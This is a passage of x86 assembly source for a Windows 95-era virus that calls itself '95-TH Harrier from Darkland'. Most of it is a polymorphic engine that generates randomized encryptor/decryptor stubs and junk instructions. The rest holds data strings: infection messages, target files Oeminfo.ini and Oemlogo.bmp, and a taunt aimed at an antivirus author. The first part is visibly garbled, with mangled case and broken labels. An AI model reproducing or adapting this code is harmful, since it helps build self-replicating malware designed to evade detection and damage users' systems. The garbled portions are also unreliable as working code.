Stosb

MOV Al, PBASEREG

SHL Al, 3H

OR Al, 80h

OR Al, PBASEREG

Stosb

Mov Padd, EDI

Stosd

MOV Al, PBASEREG

MOV AH, -1H

Call Enumer

Mov Byte Ptr PenableEncr, 1h

MOV Al, PBaseReg; Encryptor, POP Basereg

OR Al, 58H

Call Storebyte

MOV Al, 87h; Encryptor,

Call StorebyTe; Xchg Basereg, [ESP]

MOV Al, PBASEREG

SHL Al, 3H

OR Al, 4H

Call Storebyte

MOV Al, 24h

Call Storebyte

MOV Al, 68H; Encryptor, Push Encrsize

Call Storebyte

MOV EAX, [ESP]

Sub Eax, 4h

Call StoredWord

Mov EDX, 1H; .loadRegisters

MOV CL, PBASEREG

SHL EDX, CL

OR EDX, 10H

MOV Al, PBASEREG

MOV AH, -1H

GENPOLYM_L $: Push EAX

Call genmovcom

Mov Eax, 2h

Call Random

OR Al, Al

POP EAX

JZ genpolym_l1 $

Push EAX

Call gennoregcom

POP EAX

GENPOLYM_L1 $: CMP EDX, 0FFH

JNE GENPOLYM_L $

Mov ECX, 5H

Mov EBX, Offset GennoreGcom

Call Enumer

MOV Al, 1H; Encryptor, Border Setup

Call StorebyTe; Add [ESP], Basereg

MOV Al, PBASEREG

SHL Al, 3H

OR Al, 4H

Call Storebyte

MOV Al, 24h

Call Storebyte

Mov Pagain, EDI

Mov Pagain_e, ESI

MOV EAX, 40H; 10H..50h Commands

Call Random

Add Eax, 10h

MOV ECX, EAX

GENPOLYM_G0 $: MOV EAX, 3H ;. Decrypt

Call Random

OR Al, Al

MOV Al, PBASEREG

MOV AH, -1H

JNZ GENPOLYM_G1 $

Call Genarcom

JMP genpolym_g2 $

GENPOLYM_G1 $: Call Genarmemcom

GenPolym_G2 $: dec ECX

JNZ GENPOLYM_G0 $

Mov Eax, 2H; Add Basereg, 4H

Call Random

OR Al, Al

JZ genpolym_i2 $

MOV Al, PBASEREG; (Inc)

OR Al, 40h

Mov ECX, 4H

GenPolym_i1 $: Stosb

Call Storebyte

Push EAX

Call gennoregcom

POP EAX

Dec ECX

JNZ genpolym_i1 $

JMP genpolym_i3 $

GENPOLYM_I2 $: MOV Al, 83H; (Add)

Stosb

Call Storebyte

MOV Al, PBASEREG

OR Al, 0C0H

Stosb

Call Storebyte

MOV Al, 4H

Stosb

Call Storebyte

GenPolym_i3 $: MOV ECX, 5H

Mov EBX, Offset Genarcom

MOV Al, PBASEREG

MOV AH, -1H

Call Enumer

MOV Al, 81H; CMP BaseREG, LIMIT

Stosb

MOV Al, PBASEREG

OR Al, 0F8H

Stosb

Mov Eax, EDI

Sub Eax, PBase

MOV EBX, PADD

MOV [EBX], EAX; 1Pass Complete Add Command

MOV EAX, [ESP]

Sub Eax, 4h

Stosd

Mov Al, 3bh; Encryptor, Border Check

Call StorebyTe; CMP Basereg, [ESP]

MOV Al, PBASEREG

SHL Al, 3H

OR Al, 4H

Call Storebyte

MOV Al, 24h

Call Storebyte

Mov EBX, Offset Gennoflagcom

Call Enumer

MOV AX, 820FH

Stosw

Call Storeword

Mov Eax, Pagain; Complete JMP Again Commands

Sub Eax, EDI

Sub Eax, 4h

Stosd

Mov Eax, Pagain_e

Sub Eax, ESI

Sub Eax, 4h

Call StoredWord

MOV Al, 58H; Complete Encryptor

Call Storebyte

MOV Al, 0C3H

Call Storebyte

Mov Byte Ptr PenableenCr, 0h

Mov EBX, Offset Genanycom

MOV Al, PBASEREG

MOV AH, -1H

Call Enumer

MOV Al, 81H; Sub Basereg, Codesize

Stosb

MOV Al, PBASEREG

OR Al, 0e8h

Stosb

MOV PBASESUB, EDI

Stosd

MOV Al, PBASEREG

MOV AH, -1H

Call Enumer

MOV Al, 0C7H; MOV [basereg] [SEM], 2H

Stosb

MOV Al, PBASEREG

OR Al, 80h

Stosb

MOV EAX, PSEM

Stosd

Mov Eax, 2h

Stosd

MOV EAX, EDI; Complete Jmp Done Command

Sub Eax, PMOV

Sub Eax, 4h

MOV EBX, PMOV

MOV [EBX], EAX

Mov EBX, Offset Genanycom

MOV AX, -1H

Call Enumer

MOV Al, 61H; POPA

Stosb

Mov EBX, Offset GennoreGcom

Call Enumer

Mov Eax, EDI; Complete Base to Body Setup

Sub Eax, PBase

MOV EBX, PBaseAdd

MOV [EBX], EAX

MOV EBX, PADD; 2Pass Complete Add Command

SUB [EBX], EAX

MOV EBX, [ESP]; Backward Body To Base Setup

Dec EBX

And BL, 0fch; Rounded by 4h

Add Eax, EBX

MOV EBX, PBaseSub

MOV [EBX], EAX

POP ECX

Mov EDX, EDI; All Done SuccessFully!

Sub EDX, [ESP]; EDX - Decryptor Size

MOV EBX, ESI

Sub EBX, [ESP] [4]; EBX - Encryptor Size

Add ESP, 8h

RET

; ------------------------------------------------- ------------

GenarmemCom: Push Eax; Some Command That

Mov Eax, 2h; Change Memory by

Call Random; Base in Eax (AL)

OR Al, Al

JZ Genarmem_imm $

MOV Al, 2H; Add; Sub (REG)

Call Random

OR Al, Al

JZ Genarmem_R_1 $

MOV Al, 28h

Genarmem_R_1 $: OR Al, 1h

Stosb

XOR Al, 28h

Call Storebyte

POP EAX

Push EBX

MOV EBX, EAX

Genarmem_R_2 $: Call getNoespreg

CMP AL, BL

JE Genarmem_R_2 $

CMP Al, BH

JE Genarmem_R_2 $

SHL Al, 3H

OR Al, BL

POP EBX

MOV AH, Al

Call Genarmem_comp $

RET

Genarmem_Imm $: MOV Al, 2H; Add; Sub (IMM)

Call Random

Add Al, Al

OR Al, 81H

Stosb

Call Storebyte

XCHG EAX, [ESP]

Push EAX

MOV Al, 2H

Call Random

OR Al, Al

POP EAX

JZ Genarmem_i_1 $

OR Al, 28h

Genarmem_i_1 $: MOV AH, Al

XOR AH, 28H

Call Genarmem_comp $

POP EAX

CMP Al, 83H

JNE GENARMEM_I_2 $

MOV AX, 100H; Byte Operand

Call Random

Stosb

Call Storebyte

RET

Genarmem_i_2 $: MOV Eax, Randseed; DWORD OPERAND

Stosd

Call StoredWord

RET

Genarmem_comp $: Push Eax; Compile Addressing

And Al, 7h; Modes (Corrupt EAX)

CMP Al, 4h

JE Genarmem_c_1 $

CMP Al, 5h

JE Genarmem_c_2 $

POP EAX

Stosb

Genarmem_c0 $: MOV Al, AH

Push EAX

And Al, 7h

CMP Al, 4h

JE Genarmem_c_3 $

CMP Al, 5h

JE Genarmem_c_4 $

POP EAX

Call Storebyte

RET

Genarmem_c_1 $: POP EAX; [ESP]

Stosb

MOV Al, 24h

Stosb

JMP Genarmem_c0 $

GENARMEM_C_2 $: POP Eax; [EBP]

OR Al, 40h

And Al, 0FEH

Stosb

MOV Al, 25h

Stosb

MOV Al, 0H

Stosb

JMP Genarmem_c0 $

Genarmem_c_3 $: POP EAX; [ESP]

Call Storebyte

MOV Al, 24h

Call Storebyte

RET

Genarmem_c_4 $: POP Eax; [EBP]

OR Al, 40h

And Al, 0FEH

Call Storebyte

MOV Al, 25h

Call Storebyte

MOV Al, 0H

Call Storebyte

RET

; ------------------------------------------------- ------------

GenanyCom: Push EAX

Push Ebx; Some Command That

Push Edx; Changes Registers

MOV EBX, EAX; But Don't change Some

GenanyCom_0_1 $: Call getNoespreg; Registers By # in Ax (Ah, Al)

CMP Al, BL; (Corrupt Eax)

JE GenanyCom_0_1 $

CMP Al, BH

JE GenanyCom_0_1 $

MOV DL, Al

GENANYCOM_0_2 $: CALL GetNoespreg

CMP AL, BL

JE GenanyCom_0_2 $

CMP Al, BH

JE GenanyCom_0_2 $

MOV AH, DL

POP EDX

POP EBX

Push EAX

MOV Eax, 0Ch

Call Random

OR EAX, EAX

Jnz GenanyCom_1 $; "> 0"

POP Eax; Ar Command

POP EAX

JMP Genarcom

GenanyCom_1 $: Dec EAX

JNZ GenanyCom_2 $; "> 1"

POP Eax; Mov / Lea Command

POP EAX

Push Edx

Call genmovcom

POP EDX

RET

GenanyCom_2 $: Dec EAX

Jnz GenanyCom_3 $; "> 2"

POP EAX; CBW; CWDE

POP EAX

OR Al, Al

JZ GenanyCom

OR AH, AH

JZ GenanyCom

Mov Eax, 2h

Call Random

OR Al, Al

JZ GenanyCom_2_1 $

MOV Al, 66H

Stosb

GenanyCom_2_1 $: MOV Al, 98H

Stosb

RET

GenanyCom_3 $: DEC EAX

JNZ GenanyCom_4 $; "> 3"

POP EAX; CWD; CDQ

POP EAX

OR Al, Al

JZ GenanyCom

OR AH, AH

JZ GenanyCom

CMP Al, 2H

Je genanycom

CMP AH, 2H

Je genanycom

Mov Eax, 2h

Call Random

OR Al, Al

JZ GenanyCom_3_1 $

MOV Al, 66h

Stosb

GenanyCom_3_1 $: MOV Al, 99H

Stosb

RET

GenanyCom_4 $: Dec EAX

JNZ GenanyCom_5 $; "> 4"

POP EAX; AAA; DAA; DAS

POP EAX

OR Al, Al

JZ GenanyCom

OR AH, AH

JZ GenanyCom

Mov Eax, 4h

Call Random

SHL Al, 3H

OR Al, 27h

Stosb

RET

GenanyCom_5 $: DEC EAX

JNZ GenanyCom_6 $; "> 5"

POP Eax; Aad; AAM

POP EAX; Operand Must Be <> 0

OR Al, Al

JZ GenanyCom

OR AH, AH

JZ GenanyCom

Mov Eax, 2h

Call Random

OR Al, 0D4H

Stosb

MOV Al, 0FFH

Call Random

INC Al

Stosb

RET

GenanyCom_6 $: DEC EAX

Jnz GenanyCom_7 $; "> 6"

POP Eax; loop $+2

POP EAX

CMP Al, 1h

Je genanycom

CMP AH, 1H

Je genanycom

MOV AX, 0E2H

Stosw

RET

GenanyCom_7 $: DEC EAX

Jnz GenanyCom_8 $; "> 7"

MOV Al, 0D1H; ROL; SHL;

STOSB; ROR; SHR; SAR;

POP Eax; RCL; RCR

Push EBX

MOV EBX, EAX

GenanyCom_7_0 $: MOV Eax, 8h

Call Random

CMP Al, 6h

JE GenanyCom_7_0 $

SHL Al, 3H

OR Al, BL

OR Al, 0C0H

Stosb

POP EBX

POP EAX

RET

GenanyCom_8 $: DEC EAX

Jnz GenanyCom_9 $; "> 8"

MOV Al, 89h; Mov Reg1, Reg2

Stosb

POP EAX

SHL Al, 3H

OR Al, AH

OR Al, 0C0H

Stosb

POP EAX

RET

GenanyCom_9 $: DEC EAX

JNZ GenanyCom_10 $; "> 9"

MOV Al, 4H; ADC; SBB; OR;

Call Random

INC Al

SHL Al, 3H

OR Al, 1h

Push EBX

MOV EBX, EAX

MOV Al, 2H

Call Random

SHL Al, 1h

OR Al, BL

POP EBX

Stosb

POP EAX

SHL Al, 3H

OR Al, AH

OR Al, 0C0H

Stosb

POP EAX

RET

GenanyCom_10 $: DEC EAX

JNZ GenanyCom_11 $; "> 10"

MOV Al, 2H; ADC; SBB; OR; And [IMM]

Call Random

OR Al, Al

POP EAX

Pushf

Push EAX

JZ GenanyCom_10A $

MOV Al, 66h

Stosb

GenanyCom_10A $: MOV EAX, 2H

Call Random

SHL Al, 1h

OR Al, 81H

Stosb

XCHG EAX, [ESP]

Push EBX

MOV EBX, EAX

Mov Eax, 4h

Call Random

INC EAX

SHL Al, 3H

OR Al, 0C0H

OR Al, BL

POP EBX

Stosb

POP EAX

CMP Al, 83H

Je GenanyCom_10b $

Mov Ax, Word Ptr Randseed; IMM16

Stosw

POPF

JNZ GenanyCom_10c $

MOV AX, Word Ptr Randseed + 2; IMM32

Stosw

GenanyCom_10c $: POP EAX

RET

GenanyCom_10b $: MOV EAX, 100H; IMM8

Call Random

Stosb

POPF

POP EAX

RET

GenanyCom_11 $: POP EAX

OR Al, 50H; Push Reg1 / POP Reg2

Stosb

Push Eax; Seria of Commands

Mov Eax, 5h

Call Random

Push ECX

MOV ECX, EAX

OR ECX, ECX

JZ GenAnycm_11_1 $

GENANYCM_11_1 $: MOV EAX, [ESP] [2 * 4]

Call Genanycom

Dec ECX

JNZ GENANYCM_11_2 $

GenanyCm_11_2 $: POP ECX

POP EAX

Mov Al, AH

OR Al, 58H

Stosb

POP EAX

RET

; ------------------------------------------------- ------------

Genarcom: Push Eax

Push Ebx; Some Command That Pretty

Push Edx; Changes Registers

MOV EBX, EAX; But Don't change Some

Genarcom_0_1 $: Call getNoespreg; Registers By # in Ax (Ah, Al)

CMP Al, BL; (Corrupt Eax)

JE Genarcom_0_1 $

CMP Al, BH

JE Genarcom_0_1 $

MOV DL, Al

Genarcom_0_2 $: CALL GetNoespreg

CMP AL, BL

JE Genarcom_0_2 $

CMP Al, BH

JE Genarcom_0_2 $

SHL Al, 3H

OR Al, DL

OR Al, 0C0H

POP EDX

POP EBX

Push EAX

Mov Eax, 7h

Call Random

OR EAX, EAX

JNZ Genarcom_1 $; "> 0"

POP Eax; Noreg Command

POP EAX

JMP gennoregcom

Genarcom_1 $: DEC EAX

JNZ Genarcom_2 $; "> 1"

MOV Al, 87h; Xchg Reg1, Reg2

Stosb

Call Storebyte

POP EAX

Stosb

Call Storebyte

POP EAX

RET

Genarcom_2 $: DEC EAX

JNZ Genarcom_3 $; "> 2"

; PUSH reg1; Push Reg2

MOV AH, Al; Pop Reg2; Pop Reg1

And Al, 7h

OR Al, 50h

Stosb

Call Storebyte

Mov Al, AH

SHR Al, 3H

And Al, 7h

OR Al, 50h

Stosb

Call Storebyte

Push Ecx; Seria of Commands

Push EAX

Mov Eax, 5h

Call Random

MOV ECX, EAX

OR ECX, ECX

JZ Genarcom_2_1 $

Genarcom_2_2 $: MOV EAX, [ESP] [2 * 4]

Call Genarcom

Dec ECX

JNZ Genarcom_2_2 $

Genarcom_2_1 $: POP EAX

POP ECX

Mov Al, AH

And Al, 7h

OR Al, 58H

Stosb

Call Storebyte

Mov Al, AH

SHR Al, 3H

And Al, 7h

OR Al, 58H

STOSB

Call Storebyte

POP EAX

RET

Genarcom_3 $: DEC EAX

JNZ Genarcom_4 $; "> 3"

Mov Eax, 2H; xor reg1, reg2

Call Random

OR Al, 38h

OR Al, 1h

Stosb

Call Storebyte

POP EAX

Stosb

Call Storebyte

POP EAX

RET

Genarcom_4 $: DEC EAX

JNZ Genarcom_5 $; "> 4"

MOV Al, 2H; Add Reg1, Reg2

Call Random; Sub Reg1, REG2

OR Al, Al

JZ Genarcom_4_1 $

MOV Al, 28h

Genarcom_4_1 $: OR Al, 1H

Push EBX

MOV EBX, EAX

MOV Al, 2H

Call Random

OR Al, BL

Stosb

Call Storebyte

POP EBX

POP EAX

Stosb

Call Storebyte

POP EAX

RET

Genarcom_5 $: DEC EAX

JNZ Genarcom_6 $; "> 5"

MOV Al, 2H; Add; Sub; XOR [IMM]

Call Random

OR Al, Al

POP EAX

Pushf

Push EAX

JZ Genarcom_5_1 $

MOV Al, 66h

Stosb

Call Storebyte

Genarcom_5_1 $: MOV EAX, 2H

Call Random

SHL Al, 1h

OR Al, 81H

Stosb

Call Storebyte

XCHG EAX, [ESP]

Push EAX

Mov Eax, 3h

Call Random

SHL Al, 3H

Push ECX

MOV CL, Al

Mov Eax, 002830H

SHR EAX, CL

POP ECX

XCHG EBX, [ESP]

And BL, 7h

OR Al, BL

OR Al, 0C0H

Stosb

Call Storebyte

POP EBX

POP EAX

CMP Al, 83H

JE Genarcom_5_2 $

Mov AX, Word Ptr Randseed

Stosw

Call storeWord; IMM16

POPF

JNZ Genarcom_5_3 $

MOV AX, Word Ptr Randseed + 2; IMM32

Stosw

Call Storeword

Genarcom_5_3 $: POP EAX

RET

Genarcom_5_2 $: MOV EAX, 100H; IMM8

Call Random

Stosb

Call Storebyte

POPF

POP EAX

RET

Genarcom_6 $: MOV Al, 0D1H; ROL REG, 1

Stosb; Ror REG, 1

Call Storebyte

POP EAX

Push EBX

MOV EBX, EAX

Mov Eax, 2h

Call Random

SHL Al, 3H

And BL, 0C7H

OR Al, BL

Stosb

Call Storebyte

POP EBX

POP EAX

RET

; ------------------------------------------------- ------------

Genmovcom: Push Ebx; Some Command That Loads

Mov EBX, EAX; Registers by Values

GenmovCom_1 $: Call getNoespreg; But don't change Some

CMP Al, BL; Register By # in AX (AH, Al)

JE Genmovcom_1 $; set bit in mask

CMP Al, BH; Transferred in Edx

JE Genmovcom_1 $; (Corrupt EAX)

MOV EBX, EAX

Push ECX

MOV CL, Al

MOV Eax, 1

SHL EAX, CL

OR EDX, EAX; Set Bit in Mask

POP ECX

Mov Eax, 2h

Call Random

OR Al, Al

JZ Genmovcom_lea $

MOV Al, BL; Mov Style

OR Al, 0B8H

Stosb

Call Storebyte

Mov Eax, Randseed

Stosd

Call StoredWord

POP EBX

RET

Genmovcom_lea $: MOV Al, 8DH; Lea Style

Stosb

Call Storebyte

MOV Al, BL

SHL Al, 3H

OR Al, 5H

Stosb

Call Storebyte

Mov Eax, Randseed

Stosd

Call StoredWord

POP EBX

RET

; ------------------------------------------------- ------------

Gennoregcom: XOR Eax, Eax; Some Command That Don't

Mov Al, 0EH; Change Registers

Call Random; (Corrupt EAX)

OR EAX, EAX

JNZ gennoreg_1 $; "> 0"

Call gennoflagcom; Noflag Command

RET

Gennoreg_1 $: DEC EAX

JNZ gennoreg_2 $; "> 1"

MOV Al, 2H; CLC or STC

Call Random

OR Al, 0F8H

Stosb

RET

Gennoreg_2 $: DEC EAX

JNZ gennoreg_3 $; "> 2"

MOV Al, 2H; CLD or STD

Call Random

OR Al, 0fch

Stosb

RET

Gennoreg_3 $: DEC EAX

Jnz gennoreg_4 $; "> 3"

MOV Al, 0F5H; CMC

Stosb

RET

Gennoreg_4 $: DEC EAX

JNZ gennoreg_5 $; "> 4"

Mov Al, 4h; Or REG, REG

Call Random

OR Al, 8h

Stosb

Call GetEqRegs

Stosb

RET

Gennoreg_5 $: DEC EAX

JNZ gennoreg_6 $; "> 5"

MOV Al, 4H; and REG, REG

Call Random

OR Al, 20H

Stosb

Call GetEqRegs

Stosb

RET

Gennoreg_6 $: DEC EAX

JNZ Gennoreg_7 $; "> 6"

MOV Al, 4H; CMP reg1, Reg2

Call Random

OR Al, 38h

Stosb

Call getnoeqregs

Stosb

RET

Gennoreg_7 $: DEC EAX

Jnz gennoreg_8 $; "> 7"

MOV Al, 2H; Test Reg1, Reg2

Call Random

OR Al, 84H

Stosb

Call getnoeqregs

Stosb

RET

Gennoreg_8 $: Dec Eax

JNZ Gennoreg_9 $; "> 8"

MOV Al, 2H; Test Reg, 0xxxxh

Call Random

OR Al, 0F6H

Stosb

Push EAX

Call getReg

OR Al, 0C0H

Stosb

POP EAX

CMP Al, 0F6H

JNE Gennoreg_8_1 $

Mov Eax, 100H

Call Random

Stosb

RET

Gennoreg_8_1 $: MOV EAX, Randseed

Stosd

RET

Gennoreg_9 $: DEC EAX

JNZ Gennoreg_10 $; "> 9"

MOV Al, 2H; CMP REG, 0XXXXH

Call Random

OR Al, 80h

Stosb

Push EAX

Call getReg

OR Al, 0F8H

Stosb

POP EAX

CMP Al, 80h

JNE Gennoreg_9_1 $

Mov Eax, 100H

Call Random

Stosb

RET

Gennoreg_9_1 $: MOV EAX, Randseed

Stosd

RET

Gennoreg_10 $: DEC EAX

JNZ gennoreg_11 $; "> 10"

Call GetNoespreg; Inc REG / DEC REG

OR Al, 40h

Push EBX

MOV BL, Al

MOV Al, 2H

Call Random

SHL Al, 3H

OR Al, BL

POP EBX

Stosb

Push Eax; Some Seria of Commands

Push ECX

MOV EAX, 5H; How Many..

Call Random

MOV ECX, EAX

OR ECX, ECX

JZ gennoreg_10_1 $

Gennoreg_10_2 $: Call GennoreGcom

Dec ECX

JNZ gennoreg_10_2 $

Gennoreg_10_1 $: POP ECX

POP EAX

XOR Al, 8h

Stosb

RET

Gennoreg_11 $: DEC EAX

JNZ gennoreg_12 $; "> 11"

MOV Al, 2H; ROL REG, 1 / ROR REG, 1

Call Random; Inc REG, 1 / DEC REG, 1

Push EAX

MOV Al, 2H

Call Random

OR Al, Al

POP EAX

MOV AH, 0D0H

Je gennoreg_11_0 $

MOV AH, 0FEH

Gennoreg_11_0 $: OR Al, AH

Push EAX

Stosb

Call GetNoespreg

OR Al, 0C0H

Push EBX

MOV BL, Al

MOV Al, 2H

Call Random

SHL Al, 3H

OR Al, BL

POP EBX

Stosb

Push Eax; Some Seria of Commands

Push ECX

MOV EAX, 5H; How Many..

Call Random

MOV ECX, EAX

OR ECX, ECX

JZ gennoreg_11_1 $

Gennoreg_11_2 $: Call GennoreGcom

Dec ECX

JNZ gennoreg_11_2 $

Gennoreg_11_1 $: POP ECX

POP EAX

XCHG EAX, [ESP]

Stosb

POP EAX

XOR Al, 8h

Stosb

RET

Gennoreg_12 $: DEC EAX

JNZ Gennoreg_13 $; "> 12"

MOV Al, 2H; Xchg Reg1, Reg2 (Twice)

Call Random; (WITHOUT ESP)

OR Al, 86H

Push EBX

MOV BL, Al

Call getnoeqregs0

MOV AH, BL

POP EBX

XCHG AH, Al

Stosw

Push Eax; Seria ;-) from one command

Call gennoregcom

POP EAX

Stosw

RET

Gennoreg_13 $: MOV Al, 2H; Add; Sub; XOR [IMM]

Call Random; Sub; add; xor [IMM]

OR Al, Al

Pushf; _PREFIX

JZ gennoreg_13_1 $

MOV Al, 66h

Stosb

Gennoreg_13_1 $: MOV Al, 4H

Call Random

OR Al, 80h

Stosb

Push eax; _combyte

Mov Al, 3H

Call Random

SHL Al, 3H

Push eax; _comnum

Push ECX

MOV CL, Al

Mov Eax, 002830H

SHR EAX, CL

MOV ECX, EAX

Call GetNoespreg

OR CL, Al

Xchg Eax, [ESP]; _REGNUM

XCHG EAX, ECX

OR Al, 0C0H

Stosb

Mov Eax, Randseed

Push eax; _magicdword

MOV EAX, [ESP] [3 * 4]

CMP AL, 81H

JNE Gennoreg13_2 $

MOV EAX, [ESP]

Stosw

MOV EAX, [ESP] [4 * 4]

Push EAX

POPF

JNZ Gennoreg13_3 $

MOV EAX, [ESP]

SHR EAX, 16

Stosw

JMP Gennoreg13_3 $

Gennoreg13_2 $: MOV EAX, [ESP]

Stosb

Gennoreg13_3 $: Push Ecx; Seria of Commands..

Mov Eax, 5h

Call Random

MOV ECX, EAX

OR ECX, ECX

JZ gennoreg13_4 $

Gennoreg13_5 $: Call Gennoregcom

Dec ECX

JNZ Gennoreg13_5 $

Gennoreg13_4 $: POP ECX

Mov Eax, [ESP] [4 * 4]; Mirror Command

Push EAX

POPF

JZ gennoreg13_6 $

MOV Al, 66h

Stosb

Gennoreg13_6 $: MOV EAX, [ESP] [3 * 4]

Stosb

Push ECX

MOV ECX, [ESP] [2 * 4 + 4]

Mov Eax, 280030H

SHR EAX, CL

MOV ECX, EAX

MOV EAX, [ESP] [1 * 4 + 4]

OR Al, Cl

OR Al, 0C0H

Stosb

POP ECX

MOV EAX, [ESP] [3 * 4]

CMP AL, 81H

JNE Gennoreg13_7 $

MOV EAX, [ESP]

Stosw

MOV EAX, [ESP] [4 * 4]

Push EAX

POPF

JNZ Gennoreg13_8 $

MOV EAX, [ESP]

SHR EAX, 16

Stosw

Gennoreg13_8 $: Add ESP, 5 * 4

RET

Gennoreg13_7 $: MOV EAX, [ESP]

Stosb

Add ESP, 5 * 4

RET

; ------------------------------------------------- ------------

Gennoflagcom: xor Eax, Eax; Some Command That Don't

mov Al, 0ah; Change Anything

Call Random; (Corrupt EAX)

OR EAX, EAX

JNZ gennoflag_1 $; "> 0"

MOV Al, 90H; NOP Command

Stosb

RET

Gennoflag_1 $: DEC EAX

JNZ gennoflag_2 $; "> 1"

Gennoflag_1_1 $: MOV Al, 4H; Segments DS: ES: SS:

Call Random; WITHOUT CS:!

SHL Al, 3H

OR Al, 26h

CMP AL, 2EH

JE gennoflag_1_1 $

Stosb

RET

Gennoflag_2 $: DEC EAX

JNZ gennoflag_3 $; "> 2"

MOV AX, 0E3H; JECXZ $+2

Stosw

RET

Gennoflag_3 $: DEC EAX

JNZ gennoflag_4 $; "> 3"

MOV Al, 2H; XCHG REG, REG

Call Random

OR Al, 86H

Stosb

Call GetEqRegs

Stosb

RET

Gennoflag_4 $: Dec EAX

Jnz gennoflag_5 $; "> 4"

Mov Al, 4H; Mov Reg, REG

Call Random

OR Al, 88H

Stosb

Call GetEqRegs

Stosb

RET

Gennoflag_5 $: DEC EAX

JNZ gennoflag_6 $; "> 5"

Call getNoespreg; Push REG / POP REG

OR Al, 50h

Stosb

Push Eax; Some Seria of Commands

Push ECX

MOV EAX, 5H; How Many..

Call Random

MOV ECX, EAX

OR ECX, ECX

JZ gennoflag_5_1 $

Gennoflag_5_2 $: Call Gennoflagcom

Dec ECX

JNZ gennoflag_5_2 $

Gennoflag_5_1 $: POP ECX

POP EAX

OR Al, 8h

Stosb

RET

Gennoflag_6 $: DEC EAX

JNZ gennoflag_7 $; "> 6"

MOV Al, 10H; JCC $+2

Call Random

OR Al, 70h

Stosb

XOR Al, Al

Stosb

RET

Gennoflag_7 $: DEC EAX

JNZ gennoflag_8 $; "> 7"

MOV Al, 0EBH; JMPS $ ?

Stosb

MOV Al, 20H; JMP Distance..

Call Random

Stosb

Push ECX

MOV ECX, EAX

OR ECX, ECX

JZ Gennoflag_7_1 $

Gennoflag_7_2 $: MOV EAX, 100H

Call Random

Stosb

Dec ECX

JNZ gennoflag_7_2 $

Gennoflag_7_1 $: POP ECX

RET

Gennoflag_8 $: DEC EAX

JNZ gennoflag_9 $; "> 8"

MOV Al, 60H; Pusha / POPA

Stosb

Push Ecx; Some Seria of Commands

Mov Eax, 5H; How Many..

Call random

MOV ECX, EAX

OR ECX, ECX

JZ gennoflag_8_1 $

Gennoflag_8_2 $: Call Gennoflagcom

Dec ECX

JNZ gennoflag_8_2 $

Gennoflag_8_1 $: POP ECX

MOV Al, 61H

Stosb

RET

Gennoflag_9 $: MOV Al, 9CH; Pushf / Popf

Stosb

Push Ecx; Some Seria of Commands

MOV EAX, 5H; How Many..

Call Random

MOV ECX, EAX

OR ECX, ECX

JZ gennoflag_9_1 $

Gennoflag_9_2 $: Call Gennoflagcom

Dec ECX

JNZ gennoflag_9_2 $

Gennoflag_9_1 $: POP ECX

MOV Al, 9DH

Stosb

RET

; -------------------------------------------------------------
GetNoEqRegs0:   call    GetNoEspReg             ; Get registers MOD R/M
                push    ebx                     ; byte with any NoEq
                mov     bl, al                  ; registers inside
                call    GetNoEspReg             ; this pack (without ESP)
                shl     al, 3h
                or      al, bl
                or      al, 0c0h
                pop     ebx
                ret
GetNoEqRegs:    call    GetReg                  ; Get registers MOD R/M
                push    ebx                     ; byte with any NoEq
                mov     bl, al                  ; registers inside
                call    GetReg                  ; this pack
                shl     al, 3h
                or      al, bl
                or      al, 0c0h
                pop     ebx
                ret
GetEqRegs:      call    GetReg                  ; Get registers MOD R/M
                mov     ah, al                  ; byte with any Eq registers
                shl     al, 3h                  ; inside this pack
                or      al, ah
                or      al, 0c0h
                ret
GetNoEspReg:    call    GetReg                  ; Get register number
                cmp     al, 4h                  ; but without ESP
                je      GetNoEspReg
                ret
GetReg:         mov     eax, 8h                 ; Get register number
                call    Random
                ret

; -------------------------------------------------------------
Enumer:         push    eax                     ; Enumerate the some
                push    ecx                     ; procedure in EBX
                mov     eax, ecx                ; ECX times with
                call    Random                  ; parameters in EAX
                or      ecx, ecx
                jz      Enumer_0$
Enumer_1$:      mov     eax, [esp][4]
                call    ebx
                dec     ecx
                jnz     Enumer_1$
Enumer_0$:      pop     ecx
                pop     eax
                ret
; -------------------------------------------------------------
StoreByte:      cmp     byte ptr PEnableEncr, 0h        ; Stores the byte data
                je      StoreByte_0$                    ; into encryptor buffer
                mov     [esi], al
                inc     esi
StoreByte_0$:   ret
StoreWord:      cmp     byte ptr PEnableEncr, 0h        ; Stores the word data
                je      StoreWord_0$                    ; into encryptor buffer
                mov     [esi], ax
                add     esi, 2h
StoreWord_0$:   ret
StoreDWord:     cmp     byte ptr PEnableEncr, 0h        ; Stores the dword data
                je      StoreDWord_0$                   ; into encryptor buffer
                mov     [esi], eax
                add     esi, 4h
StoreDWord_0$:  ret
; -------------------------------------------------------------
Random:         push    edx                     ; Generate some random number
                push    ecx                     ; to EAX by border in EAX
                push    eax                     ; (0..border-1)
                mov     eax, RandSeed           ; Don't corrupt registers
                mov     ecx, 8088405h           ; [from Turbo Pascal v7.0]
                mul     ecx                     ; (based on congruential
                inc     eax                     ; generating algorithm)
                mov     RandSeed, eax
                pop     ecx
                mul     ecx
                pop     ecx
                mov     eax, edx
                pop     edx
                ret
; Separetor = _nop

; -------------------------------------------------------------
; Data for convertor
                DefCodeLine
ConvertDataLen  = 4h
ConvertData     label   dword
                dd      offset SearchStr1
                dd      offset ReplaceStr1
                dd      offset SearchStr2
                dd      offset ReplaceStr2
                dd      offset SearchStr3
                dd      offset ReplaceStr3
                dd      offset SearchStr4
                dd      offset ReplaceStr4
                BreakCodeLine
SearchStr1      db      'Microsoft', 0
SearchStr2      db      'Windows', 0
SearchStr3      db      'Bill Gates', 0
SearchStr4      db      'Harrier', 0
ReplaceStr1     db      'Microsoft', 0
ReplaceStr2     db      'Windows', 0
ReplaceStr3     db      'Gill Bates', 0
ReplaceStr4     db      'OH! Guys! Is IT About Me?', 0
; -------------------------------------------------------------
                DefCodeLine
InfoName        db      'Oeminfo.ini', 0h
InfoNameL       = $-InfoName
                BreakCodeLine
                DefCodeLine
BitmapName      db      'Oemlogo.bmp', 0h
BitmapNameL     = $-BitmapName
                BreakCodeLine
SelfSectionName db      '.Text', 0,0,0
InfSelfHeader   db      '"95-TH Harrier from Darkland"', 0
InfEnterDebug   db      'Entering to Debug Mode.', 0
InfCancelMsg    db      'Infecting Aborted by Creator!', 0
InfNoNameMsg    db      'Name Not Specified.', 0
                DefCodeLine
HelloMsg        label   byte
                db      'OOPS, World, IT IS ME!', CR
                db      'CAN you image it? I am the win32 platform based virus!', CR
                db      'Hey, Daniloff! Will You Porte your drweb at this platage form?', CR
                db      'HMM, Guy, What You Think About Watcom C ?', CR
                db      CR
